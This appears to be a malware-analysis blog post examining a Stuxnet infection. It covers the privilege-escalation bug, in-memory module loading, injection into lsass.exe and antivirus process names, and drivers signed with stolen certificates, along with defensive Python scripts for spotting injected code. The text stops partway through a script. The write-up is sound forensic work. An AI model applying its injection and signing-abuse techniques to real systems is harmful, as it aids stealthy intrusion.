 010012C8  .text   Import ( comdlg32.FindTextW  
 010010F4  .text   Import   KERNEL32.FoldStringW  
 0100114C  .text   Import ( KERNEL32.FormatMessageW  
 0100115C  .text   Import ( KERNEL32.GetACP  
 01001188  .text   Import ( USER32.GetClientRect  
 01001114  .text   Import ( KERNEL32.GetCommandLineW  
 010010C0  .text   Import ( KERNEL32.GetCurrentProcess  
 0100110C  .text   Import ( KERNEL32.GetCurrentProcessId  
 0100108C  .text   Import ( KERNEL32.GetCurrentThreadId  
 01001238  .text   Import ( USER32.GetCursorPos  
 010010A0  .text   Import ( KERNEL32.GetDateFormatW  
 01001194  .text   Import ( USER32.GetDC  
 010011E4  .text   Import ( USER32.GetDesktopWindow  
 01001060  .text   Import ( GDI32.GetDeviceCaps  
 0100122C  .text   Import ( USER32.GetDlgCtrlID  
 01001274  .text   Import ( USER32.GetDlgItem  
 01001284  .text   Import ( USER32.GetDlgItemTextW  
 01001124  .text   Import ( KERNEL32.GetFileAttributesW  
 010010B0  .text   Import ( KERNEL32.GetFileInformationByHandle  
 010012D4  .text   Import ( comdlg32.GetFileTitleW  
 010011E8  .text   Import ( USER32.GetFocus  
 010011B4  .text   Import ( USER32.GetForegroundWindow  
 010011A0  .text   Import ( USER32.GetKeyboardLayout  
 01001138  .text   Import ( KERNEL32.GetLastError  
 010010D8  .text   Import ( KERNEL32.GetLocaleInfoW  
 01001098  .text   Import ( KERNEL32.GetLocalTime  
 01001320  .text   Import   msvcrt.__getmainargs  
 01001264  .text   Import ( USER32.GetMenu  
 01001258  .text   Import ( USER32.GetMenuState  
 010012A8  .text   Import ( USER32.GetMessageW  
 010010CC  .text   Import ( KERNEL32.GetModuleHandleA  
 0100105C  .text   Import ( GDI32.GetObjectW  
 010012D8  .text   Import ( comdlg32.GetOpenFileNameW  
 0100128C  .text   Import ( USER32.GetParent  
 010012B4  .text   Import   WINSPOOL.GetPrinterDriverW  
 01001110  .text   Import ( KERNEL32.GetProcAddress  
 010012E4  .text   Import ( comdlg32.GetSaveFileNameW  
 010010D0  .text   Import ( KERNEL32.GetStartupInfoA  
 01001058  .text   Import ( GDI32.GetStockObject  
 01001260  .text   Import ( USER32.GetSubMenu  
 010011CC  .text   Import ( USER32.GetSystemMenu  
 0100121C  .text   Import ( USER32.GetSystemMetrics  
 010010B8  .text   Import ( KERNEL32.GetSystemTimeAsFileTime  
 0100103C  .text   Import ( GDI32.GetTextExtentPoint32W  
 01001048  .text   Import ( GDI32.GetTextFaceW  
 0100106C  .text   Import ( GDI32.GetTextMetricsW  
 01001090  .text   Import ( KERNEL32.GetTickCount  
 010010A4  .text   Import   KERNEL32.GetTimeFormatW  
 0100109C  .text   Import ( KERNEL32.GetUserDefaultLCID  
 01001150  .text   Import   KERNEL32.GetUserDefaultUILanguage  
 01001270  .text   Import ( USER32.GetWindowLongW  
 010011BC  .text   Import ( USER32.GetWindowPlacement  
 01001218  .text   Import ( USER32.GetWindowTextW  
 010010D4  .text   Import ( KERNEL32.GlobalFree  
 010010A8  .text   Import ( KERNEL32.GlobalLock  
 010010AC  .text   Import ( KERNEL32.GlobalUnlock  
 01001324  .text   Import   msvcrt._initterm  
 01001224  .text   Import ( USER32.InvalidateRect  
 01001250  .text   Import ( USER32.IsClipboardFormatAvailable  
 010012A0  .text   Import ( USER32.IsDialogMessageW  
 010011B8  .text   Import ( USER32.IsIconic  
 0100100C  .text   Import   ADVAPI32.IsTextUnicode  
 01001304  .text   Import ( msvcrt.iswctype  
 010011C8  .text   Import ( USER32.LoadAcceleratorsW  
 010011D8  .text   Import ( USER32.LoadCursorW  
 010011EC  .text   Import ( USER32.LoadIconW  
 010011D4  .text   Import ( USER32.LoadImageW  
 010010C8  .text   Import ( KERNEL32.LoadLibraryA  
 010011C4  .text   Import ( USER32.LoadStringW  
 010010E0  .text   Import ( KERNEL32.LocalAlloc  
 010010DC  .text   Import ( KERNEL32.LocalFree  
 010010F0  .text   Import ( KERNEL32.LocalLock  
 01001148  .text   Import ( KERNEL32.LocalReAlloc  
 01001134  .text   Import ( KERNEL32.LocalSize  
 010012FC  .text   Import ( msvcrt.localtime  
 010010E8  .text   Import ( KERNEL32.LocalUnlock  
 01001074  .text   Import ( GDI32.LPtoDP  
 01001118  .text   Import ( KERNEL32.lstrcatW  
 01001108  .text   Import ( KERNEL32.lstrcmpiW  
 01001128  .text   Import ( KERNEL32.lstrcmpW  
 01001130  .text   Import ( KERNEL32.lstrcpynW  
 010010FC  .text   Import ( KERNEL32.lstrcpyW  
 010010E4  .text   Import ( KERNEL32.lstrlenW  
 01001168  .text   Import ( KERNEL32.MapViewOfFile  
 010011AC  .text   Import ( USER32.MessageBeep  
 01001268  .text   Import ( USER32.MessageBoxW  
 0100739D  .text   Export   <ModuleEntryPoint>  
 01001220  .text   Import ( USER32.MoveWindow  
 0100112C  .text   Import ( KERNEL32.MulDiv  
 01001164  .text   Import ( KERNEL32.MultiByteToWideChar  
 01001254  .text   Import ( USER32.OpenClipboard  
 010012BC  .text   Import   WINSPOOL.OpenPrinterW  
 010012C4  .text   Import   comdlg32.PageSetupDlgW  
 01001208  .text   Import ( USER32.PeekMessageW  
 010012A4  .text   Import ( USER32.PostMessageW  
 010011F4  .text   Import ( USER32.PostQuitMessage  
 010012CC  .text   Import   comdlg32.PrintDlgExW  
 01001330  .text   Import   msvcrt.__p__commode  
 01001334  .text   Import   msvcrt.__p__fmode  
 01001094  .text   Import ( KERNEL32.QueryPerformanceCounter  
 01001100  .text   Import ( KERNEL32.ReadFile  
 01001004  .text   Import ( ADVAPI32.RegCloseKey  
 01001008  .text   Import ( ADVAPI32.RegCreateKeyW  
 010011D0  .text   Import ( USER32.RegisterClassExW  
 010011F8  .text   Import ( USER32.RegisterWindowMessageW  
 01001014  .text   Import ( ADVAPI32.RegOpenKeyExA  
 01001010  .text   Import ( ADVAPI32.RegQueryValueExA  
 01001000  .text   Import ( ADVAPI32.RegQueryValueExW  
 01001018  .text   Import ( ADVAPI32.RegSetValueExW  
 01001190  .text   Import ( USER32.ReleaseDC  
 010012DC  .text   Import ( comdlg32.ReplaceTextW  
 01001234  .text   Import ( USER32.ScreenToClient  
 01001084  .text   Import ( GDI32.SelectObject  
 0100123C  .text   Import ( USER32.SendDlgItemMessageW  
 01001240  .text   Import ( USER32.SendMessageW  
 01001044  .text   Import ( GDI32.SetAbortProc  
 0100119C  .text   Import ( USER32.SetActiveWindow  
 01001070  .text   Import ( GDI32.SetBkMode  
 0100118C  .text   Import ( USER32.SetCursor  
 0100127C  .text   Import ( USER32.SetDlgItemTextW  
 01001154  .text   Import ( KERNEL32.SetEndOfFile  
 01001278  .text   Import ( USER32.SetFocus  
 01001140  .text   Import ( KERNEL32.SetLastError  
 01001080  .text   Import ( GDI32.SetMapMode  
 01001200  .text   Import ( USER32.SetScrollPos  
 010010C4  .text   Import ( KERNEL32.SetUnhandledExceptionFilter  
 01001328  .text   Import   msvcrt.__setusermatherr  
 0100107C  .text   Import ( GDI32.SetViewportExtEx  
 01001078  .text   Import ( GDI32.SetWindowExtEx  
 0100126C  .text   Import ( USER32.SetWindowLongW  
 010011DC  .text   Import ( USER32.SetWindowPlacement  
 010011F0  .text   Import ( USER32.SetWindowTextW  
 010012AC  .text   Import ( USER32.SetWinEventHook  
 01001338  .text   Import   msvcrt.__set_app_type  
 01001180  .text   Import ( SHELL32.ShellAboutW  
 010011B0  .text   Import ( USER32.ShowWindow  
 01001314  .text   Import ( msvcrt._snwprintf  
 01001050  .text   Import ( GDI32.StartDocW  
 01001038  .text   Import ( GDI32.StartPage  
 010010BC  .text   Import ( KERNEL32.TerminateProcess  
 0100104C  .text   Import ( GDI32.TextOutW  
 010012F8  .text   Import ( msvcrt.time  
 0100129C  .text   Import ( USER32.TranslateAcceleratorW  
 01001298  .text   Import ( USER32.TranslateMessage  
 0100116C  .text   Import ( KERNEL32.UnhandledExceptionFilter  
 01001290  .text   Import ( USER32.UnhookWinEvent  
 01001160  .text   Import ( KERNEL32.UnmapViewOfFile  
 010011FC  .text   Import ( USER32.UpdateWindow  
 01001310  .text   Import ( msvcrt.wcsncmp  
 01001340  .text   Import ( msvcrt.wcsncpy  
 01001144  .text   Import ( KERNEL32.WideCharToMultiByte  
 01001228  .text   Import ( USER32.WinHelpW  
 0100113C  .text   Import ( KERNEL32.WriteFile  
 01001280  .text   Import ( USER32.wsprintfW  
 0100130C  .text   Import ( msvcrt._wtol  
 010012EC  .text   Import   msvcrt._XcptFilter  

The Import Address Table (IAT) is a table of function pointers, one slot per imported API, that the loader fills in when the image is mapped. A compiled program cannot know where kernel32.dll or user32.dll will end up in its address space, so every API call goes through the slot indirectly, either as call dword ptr [slot] or through a small jmp dword ptr [slot] thunk like the ones listed above. That indirection is also what makes IAT hooking work: overwrite one slot and every call to that API from the module lands in the hook first.

In the import list above we can see USER32.GetKeyboardLayout. The keyboard-layout bug Stuxnet exploits (CVE-2010-2743, fixed in MS10-073) does not live in that call itself but in win32k!NtUserLoadKeyboardLayoutEx, the win32k system call behind user32's LoadKeyboardLayoutW. It is one of Stuxnet's two local privilege-escalation zero-days (the other being the Task Scheduler flaw), used to get from user mode into ring 0; the other two zero-days Stuxnet carried, the LNK shortcut and Print Spooler bugs, are for propagation rather than escalation.

I would have loved to set a breakpoint on win32k!NtUserLoadKeyboardLayoutEx and trace the malware as it's extremely interesting, but setting breakpoints is not possible on an LKD session. I would have needed to break in to another physical machine (which I don't have), or set up a host > virtual COM port, which is a bit of a pain. I'll chalk it up to something to do on a rainy day. Call me lazy... I know.

3. Calls LoadLibraryW (exported from kernel32.dll) with a specially crafted file name of the form KERNEL32.DLL.ASLR.[HEX] or SHELL32.DLL.ASLR.[HEX]. No such file exists on disk; the hooks Stuxnet places in ntdll recognise the name pattern and map the module from memory instead of from a file. Below we can see an example of a KERNEL32 variant:


4. Calls desired exported function.

5. Calls FreeLibrary to unload the library once the export returns.

New Process Inject

The second injection method creates a fresh process and replaces its contents:

1. Creates host process.

2. Replaces the process image with the Stuxnet module to execute, together with a small loader stub that loads the module and calls the specified export with the supplied parameters.

The host process image is picked from a list of names that a user (or a security product) would expect to see running, Windows' own lsass.exe by default and otherwise the process of whichever security product Stuxnet finds installed:

  • lsass.exe - Microsoft's own system process, in charge of enforcing the local security policy.
  • avp.exe - Kaspersky.
  • mcshield.exe - McAfee VirusScan.
  • avguard.exe - Avira Personal Edition.
  • bdagent.exe - Bitdefender Switch Agent.
  • UmxCfg.exe - eTrust Configuration Engine (HIPS).
  • fsdfwd.exe - F-Secure.
  • rtvscan.exe - Symantec Real time Virus Scan Service.
  • ccSvchst.exe - Symantec Service Framework.
  • ekrn.exe - ESET Service Process.
  • tmproxy.exe - TrendMicro (PC-cillin in Australia and Virus Buster in Japan).

Malware Execution and Infection

First of all, to get the sample to install at all you need to set the system clock to before June 24th, 2012. Stuxnet's installer checks the date and refuses to infect the machine after that point (the removable-drive spreader stops as well), so on a VM with a current clock the dropper simply exits. This is an infection cut-off, not a self-destruct: machines already infected are not cleaned. It was most likely a containment measure, built on the assumption that Stuxnet would not escape the target facilities, and it also limits how long any escaped copies keep spreading while the code is being reversed and defeated.

This piece of malware wanted to stay inside those facilities, target the Siemens control systems, cause real physical damage, spread just enough to reach more of them, and then go quiet. As it happened it did escape its intended environment (some even speculate deliberately) and was reversed and defeated long before its hard-coded cut-off date.

First, let's take a pre-infection look at the system with Autoruns and Process Explorer:

(Ignore the file not found messages)

Note the checked filter options > Verify code signatures + Hide Microsoft entries.


Everything looks pretty normal, nothing out of the ordinary, and there is exactly one instance of lsass.exe.

Now let's turn things up a bit by executing the malware and comparing against the pre-infection results:


We can see now within Autoruns two new services, MRxCls and MRxNet. These are Stuxnet's two kernel-mode drivers. MRxCls is the loader: at boot it injects Stuxnet's main module into the processes named in its encrypted configuration, which is stored as the Data value under its own service key (visible in the registry diff later on). MRxNet is a file-system filter driver and provides the rootkit functionality, hiding Stuxnet's files on removable drives.

One big thing about malware that reaches the public media (for whatever reason, we'll assume popularity/intention) is that journalists love to spin it with awkward buzzwords: Undefeatable, The Most Sophisticated Malware, and so on. Was Stuxnet an elaborate piece of code? Yes, absolutely. Not only was the usual rootkit and Windows-internals knowledge needed, but heavy reverse engineering of Siemens' Step 7/WinCC software and the S7 PLCs it programs was necessary as well.

However, one of Stuxnet's biggest weak points was its near-total lack of anti-debugging and anti-reversing measures. It uses no virtualising obfuscator, the drivers are not packed, and you can literally use plain regedit to find the service keys for both MRxCls and MRxNet. For example:



This has led Stuxnet to be something of a joke among some reverse engineers and analysts, even more so if you believe it was created by [insert government]. It's hard to imagine [insert government] wouldn't go to any lengths to hide its malware, but then again you never really know, right? : ) I'll continue the discussion of its kernel-mode functionality a little later, as I'd like to swing back to user mode real quick.

I couldn't get Process Explorer to run after infection, as the VM would bugcheck. I have no idea why, and AFAIK Stuxnet doesn't employ anti-debugging against Sysinternals tools by any means, so it was likely a buggy sample. I digress, and used VMmap instead:


We can see there are now three instances of lsass.exe, two of which are fake (the newly created host processes). So first off, which is our legitimate lsass.exe? Two of the three have PIDs above 1000, so as a first guess let's assume the one that doesn't is the original. (On its own that is a weak heuristic: on XP the real lsass.exe is the single instance started by winlogon.exe early in boot, so parent process and start time are the reliable tells. The memory layout checked below confirms the guess.)


If we sort by the Protection column, we can see it's mostly Execute/Read, which doesn't raise any red flags. Let's assume for the moment this is the legitimate one and take a look at another:


Uh oh: this lsass.exe has two shareable memory regions with Write permission in addition to Execute and Read. A region that is readable, writable and executable at once is a huge red flag for an injected or hollowed process; normally code is mapped Execute/Read and data Read/Write, never both. Note also that Size, Committed and Total Working Set are all equal for those regions: every page was committed and touched, which is exactly what freshly written code looks like. We can now determine that PID 648 is legitimate and PID 1812 is fake, and we can assume PID 1840 is fake as well:


Yep! Here we have five shareable regions with R/W/E permissions, and on top of that ntdll itself mapped R/W/E. Size, Committed and Total Working Set are equal again. At this point we can say with confidence that 1812 and 1840 are our fake lsass.exe instances, and the writable ntdll mapping in 1840 is where Stuxnet's in-memory patching of ntdll (the hooks that service its *.ASLR.* load requests) shows up.
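To turn the VMMap checks above into something repeatable, here is an added Python triage script; it is not from the original post and contains no Stuxnet code. It reads a region listing in the shape of a VMMap CSV export (the column set Address, Type, Size, Committed, Total WS, Protection, Details is an assumption of the example) and flags the two things spotted by hand: regions that are readable, writable and executable at once, and image mappings that are writable and executable. The three listings embedded below are constructed for the example; only the PIDs mirror the post, the addresses and sizes are invented.

```python
import csv
import io

# Constructed listings in the shape of a VMMap CSV export, one per process.
# Only the PIDs mirror the post; addresses and sizes are invented for the example.
SAMPLE_EXPORTS = {
    648: """Address,Type,Size,Committed,Total WS,Protection,Details
0x7C900000,Image,"712 K","712 K","528 K",Execute/Read,C:\\WINDOWS\\system32\\ntdll.dll
0x01000000,Image,"24 K","24 K","24 K",Execute/Read,C:\\WINDOWS\\system32\\lsass.exe
0x00090000,Private Data,"64 K","12 K","12 K",Read/Write,
""",
    1812: """Address,Type,Size,Committed,Total WS,Protection,Details
0x7C900000,Image,"712 K","712 K","528 K",Execute/Read,C:\\WINDOWS\\system32\\ntdll.dll
0x00F40000,Shareable,"500 K","500 K","500 K",Execute/Read/Write,
0x01160000,Shareable,"36 K","36 K","36 K",Execute/Read/Write,
""",
    1840: """Address,Type,Size,Committed,Total WS,Protection,Details
0x7C900000,Image,"712 K","712 K","712 K",Execute/Read/Write,C:\\WINDOWS\\system32\\ntdll.dll
0x00A20000,Shareable,"500 K","500 K","500 K",Execute/Read/Write,
""",
}


def _kb(field):
    """Parse a VMMap-style size such as '712 K' or '1,024 K' into an integer KB."""
    return int(field.replace(",", "").split()[0])


def suspicious_regions(csv_text):
    """Return (address, reason) for every region that has no business in lsass.exe."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        prot = row["Protection"]
        # 'Copy on Write' is how image data is normally mapped; it is not a real write.
        writable = "Write" in prot and "Copy on Write" not in prot
        executable = "Execute" in prot
        # Size == Committed == Total WS: every page committed and touched,
        # which is what a freshly written injected module looks like.
        resident = _kb(row["Size"]) == _kb(row["Committed"]) == _kb(row["Total WS"])
        if not (writable and executable):
            continue
        if row["Type"] == "Image":
            # Code of a mapped image is Execute/Read; writable+executable means
            # the module was patched in place (ntdll in PID 1840 above).
            reason = "writable+executable image mapping: " + row["Details"]
        else:
            reason = "RWX " + row["Type"].lower() + " region"
            if resident:
                reason += " (fully committed and resident)"
        findings.append((row["Address"], reason))
    return findings


def triage(exports):
    """Map each PID to its list of findings."""
    return {pid: suspicious_regions(text) for pid, text in exports.items()}


def likely_legitimate(exports):
    """PIDs whose listing raised no findings; for lsass.exe there should be exactly one."""
    return sorted(pid for pid, hits in triage(exports).items() if not hits)


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EXPORTS).items():
        print(pid, "clean" if not hits else hits)
    print("likely legitimate lsass.exe:", likely_legitimate(SAMPLE_EXPORTS))
```

The script deliberately treats a writable image mapping as its own category: an RWX private or shareable region says "someone wrote code here", while a writable ntdll says "someone patched the loader's own code", which is the stronger of the two findings.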

Let's further compare the three images based on their strings:

(PID 648 - legit)

(PID 1812 - fake #1)

Note we have quite a change here, the important one being "!This program cannot be run in DOS mode.". That string is the DOS stub that sits at the start of every PE file, right after the MZ header (magic bytes 4D 5A, which is the 4D we see in the ASCII column). A legitimately loaded DLL keeps its headers in its image mapping, so finding the stub text inside a region that is not a mapped image means a complete PE was written into the process by hand, i.e. injected. Let's take a look at the bottom of the string list:

(PID 1812 - fake #1)

We can see a number of import names, such as InternetOpen, which lsass.exe has no reason to call. At this point we can determine the DLL was successfully injected into this lsass.exe image.

We can of course expect similar results with PID 1840:

(PID 1840 - fake #2)

We can also see abnormal termination of the NT Kernel, as well as a jmp:


Another big red flag of a malformed image.
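The strings finding above is worth automating: an injected PE brings its MZ header and DOS stub with it. Here is an added Python example (not from the post) that scans a raw memory dump for MZ headers whose e_lfanew points at a valid PE signature with a sane machine type and section count, which is the usual way to carve injected modules out of process memory. The dump it scans is constructed inline: zero filler with a hand-built, header-only PE (not a loadable image) written in at 0x1000, plus a decoy "MZ" at 0x20 to show why the e_lfanew check matters.

```python
import struct

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."
IMAGE_FILE_MACHINE = {0x14C: "i386", 0x8664: "x64"}


def build_minimal_pe(machine=0x14C, sections=1):
    """Hand-build PE headers only (not a loadable binary) for the constructed dump."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"                                   # IMAGE_DOS_HEADER.e_magic
    struct.pack_into("<I", dos, 0x3C, e_lfanew)        # e_lfanew -> PE signature
    dos[0x4E:0x4E + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (executable image + DLL)
    file_header = struct.pack("<HHIIIHH", machine, sections, 0, 0, 0, 0xE0, 0x2102)
    return bytes(dos) + b"PE\0\0" + file_header + b"\0" * 0xE0


def constructed_dump():
    """Zero filler with PE headers injected at 0x1000 and a decoy 'MZ' at 0x20."""
    dump = bytearray(0x4000)
    dump[0x20:0x22] = b"MZ"                            # stray bytes, no valid e_lfanew
    pe = build_minimal_pe()
    dump[0x1000:0x1000 + len(pe)] = pe
    return bytes(dump)


def find_embedded_pe(blob):
    """Return (offset, machine, sections) for every plausible PE header in blob."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # e_lfanew must stay in range and land exactly on 'PE\0\0'
            if (0x40 <= e_lfanew < 0x1000 and pe + 24 <= len(blob)
                    and blob[pe:pe + 4] == b"PE\0\0"):
                machine, nsec = struct.unpack_from("<HH", blob, pe + 4)
                if machine in IMAGE_FILE_MACHINE and 0 < nsec <= 96:
                    hits.append((pos, machine, nsec))
        pos = blob.find(b"MZ", pos + 1)
    return hits


def has_dos_stub(blob):
    """True if the stub string seen in the injected lsass.exe strings listing is present."""
    return DOS_STUB_TEXT in blob


if __name__ == "__main__":
    dump = constructed_dump()
    for offset, machine, nsec in find_embedded_pe(dump):
        print("PE at 0x%X: %s, %d sections" % (offset, IMAGE_FILE_MACHINE[machine], nsec))
    print("DOS stub string present:", has_dos_stub(dump))
```

Run against a real dump (for example a region exported from VMMap or a whole-process dump), the same function turns the manual "look for the DOS stub" check into a list of candidate injected modules, with the decoy showing why matching "MZ" alone produces noise.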

Let's head back to our kernel-mode drivers, MRxCls and MRxNet. As noted above, neither driver is packed or wrapped in a protector, so inspecting them in depth is painless:

First off, both drivers are digitally signed, and the signatures are not forged: they were made with a genuine code-signing certificate stolen from Realtek Semiconductor (a later driver variant used one stolen from JMicron), both issued by VeriSign. The chain validates like any other vendor's; what is fraudulent is the use of the key, not the signature. For example:


We can see MRxCls is signed with the Realtek certificate issued by VeriSign. Realtek is a legitimate company that ships plenty of drivers (audio, network), so this would satisfy a user who questioned the MRxCls/MRxNet drivers, and on 64-bit Windows it satisfies the kernel-mode code-signing requirement as well. VeriSign revoked the Realtek certificate in July 2010, but the kernel's load-time signature check does not consult revocation lists, and any tool that only asks "is it signed?" rather than "is the signer the vendor I expect for this file?" is still fooled. That is the practical lesson here: a valid signature proves the key was used, not that the publisher consented.

Using SwishDbgExt, let's dump the list of objects:

 lkd> !ms_object  
   Object: \ (Directory)  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | Hdle | Object Type     | Addr        | Name                                                                                                                               |  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | 0000 | Directory      | 0xFFFFFFFFE100D748 | ArcName                                                                                                                             |   
   | 0000 | Device        | 0xFFFFFFFF821C75C0 | Ntfs                                                                                                                               |   
   | 0000 | Port         | 0xFFFFFFFFE15EABB8 | SeLsaCommandPort                                                                                                                         |   
   | 0000 | Key         | 0xFFFFFFFFE1010478 | \REGISTRY                                                                                                                            |   
   | 0000 | Port         | 0xFFFFFFFFE186B9E8 | ThemeApiPort                                                                                                                           |   
   | 0000 | Port         | 0xFFFFFFFFE1B05230 | XactSrvLpcPort                                                                                                                          |   
   | 0000 | Directory      | 0xFFFFFFFFE15AA4B8 | NLS                                                                                                                               |   
   | 0000 | SymbolicLink     | 0xFFFFFFFFE1008748 | DosDevices                                                                                                                            |   
   | 0000 | Port         | 0xFFFFFFFFE13D4B68 | SeRmCommandPort                                                                                                                         |   
   | 0000 | Port         | 0xFFFFFFFFE173BA00 | LsaAuthenticationPort                                                                                                                      |   
   | 0000 | Device        | 0xFFFFFFFF82063A90 | Dfs                                                                                                                               |   
   | 0000 | Event        | 0xFFFFFFFF821EF5C0 |                                                                                                                                 |   
   | 0000 | Directory      | 0xFFFFFFFFE100E838 | Driver  

The \Driver directory is where the object manager keeps every driver object, so it's the natural place to look for ours:

 lkd> !ms_object 0xFFFFFFFFE100E838  
   Object: Driver (Directory)  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | Hdle | Object Type     | Addr        | Name                                                                                                                               |  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | 0000 | Driver        | 0xFFFFFFFF8231ECC0 | \Driver\Beep                                                                                                                           |   
   | 0000 | Driver        | 0xFFFFFFFF821C72C0 | \Driver\NDIS                                                                                                                           |   
   | 0000 | Driver        | 0xFFFFFFFF821D39C0 | \Driver\KSecDD                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF82198F38 | \Driver\Mouclass                                                                                                                         |   
   | 0000 | Driver        | 0xFFFFFFFF82245410 | \Driver\Raspti                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF81F18768 | \Driver\es1371                                                                                                                          |   
   ...                                                                                                                      |   
   | 0000 | Driver        | 0xFFFFFFFF81EA2880 | \Driver\MRxCls                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF821DE4A0 | \Driver\PCnet                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF81F0FAE8 | \Driver\MRxNet  

Let's dump the driver object information for MRxNet:

 lkd> !drvobj 81f0fae8  
 Driver object (81f0fae8) is for:  
  \Driver\MRxNet  
 Driver Extension List: (id , addr)  
 Device Object list:  
 820ee288 81f10020 81ebac80 82136298  
 82302298 82339be0 821bb500 821996c0  
 821bc238 8224a9d0   

We can see MRxNet has a lot of device objects, so let's check one:

 lkd> !devobj 81ebac80   
 Device object (81ebac80) is for:  
  \Driver\MRxNet DriverObject 81f0fae8  
 Current Irp 00000000 RefCount 0 Type 00000003 Flags 00000080  
 DevExt 81ebad38 DevObjExt 81ebad40   
 ExtensionFlags (0000000000)   
 AttachedTo (Lower) 821d4450 \FileSystem\Cdfs  

MRxNet creates a device object of its own for each file-system device it cares about and attaches it to the top of that device stack, which is how a legacy file-system filter driver works. Here it sits above \FileSystem\Cdfs, the CD-ROM file system; it does the same for ntfs.sys and fastfat.sys (the latter covering the FAT-formatted USB drives Stuxnet spreads on). Once attached, every IRP bound for the underlying file system passes through MRxNet first, so it can successfully intercept and rewrite directory listings, which is how it hides the .lnk and ~WTR*.tmp files it drops on removable drives.

Other than checking regedit, we can also confirm the existence of the MRxCls service within the registry using the !dreg command, which displays formatted registry key information. Before we do this however, we need to load ntsdexts.dll, or we'll get the following:

 lkd> !dreg System\CurrentControlSet\Services  
 No export dreg found  

This is because ntsdexts.dll is not in the extension DLL chain by default:

 lkd> .chain  
 Extension DLL search Path:  
   C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem  
 Extension DLL chain:  
   dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]  
   ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]  
   exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]  
   kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]  
   kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]  

After loading it however with .load ntsdexts, we can then see it's in the list:

 lkd> .chain  
 Extension DLL search Path:  
   C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem  
 Extension DLL chain:  
   ntsdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:08 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]  
   dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]  
   ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]  
   exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]  
   kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]  
   kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]  

Let's now run !dreg again with our path to MRxCls:

 lkd> !dreg System\CurrentControlSet\Services\MRxCls  
 Subkey: Enum  

There it is, and its only subkey is Enum. That matches the regedit screenshot of its service key shown earlier.
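Two things a practitioner would script when reading the registry diff that follows: pulling out every service key whose Type is 0x1 (a kernel driver) together with its ImagePath and Start value, and decoding the UserAssist entries, which Explorer stores with ROT13-encoded names and, on XP, a 16-byte value of session ID, run count and last-run FILETIME. Here is an added Python example (not from the post) that does both. The lines it parses are constructed for the example in the shape of that diff (path, colon, value), and the value-layout assumptions (XP's 16-byte format and its run-count bias of 5) are noted in the comments.

```python
import codecs
import re
import struct
from datetime import datetime, timedelta

# Constructed lines in the shape of the registry diff below ("path: value");
# the SID and folder layout follow the post, the selection is the example's own.
DIFF_LINES = r"""
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Type: 0x00000001
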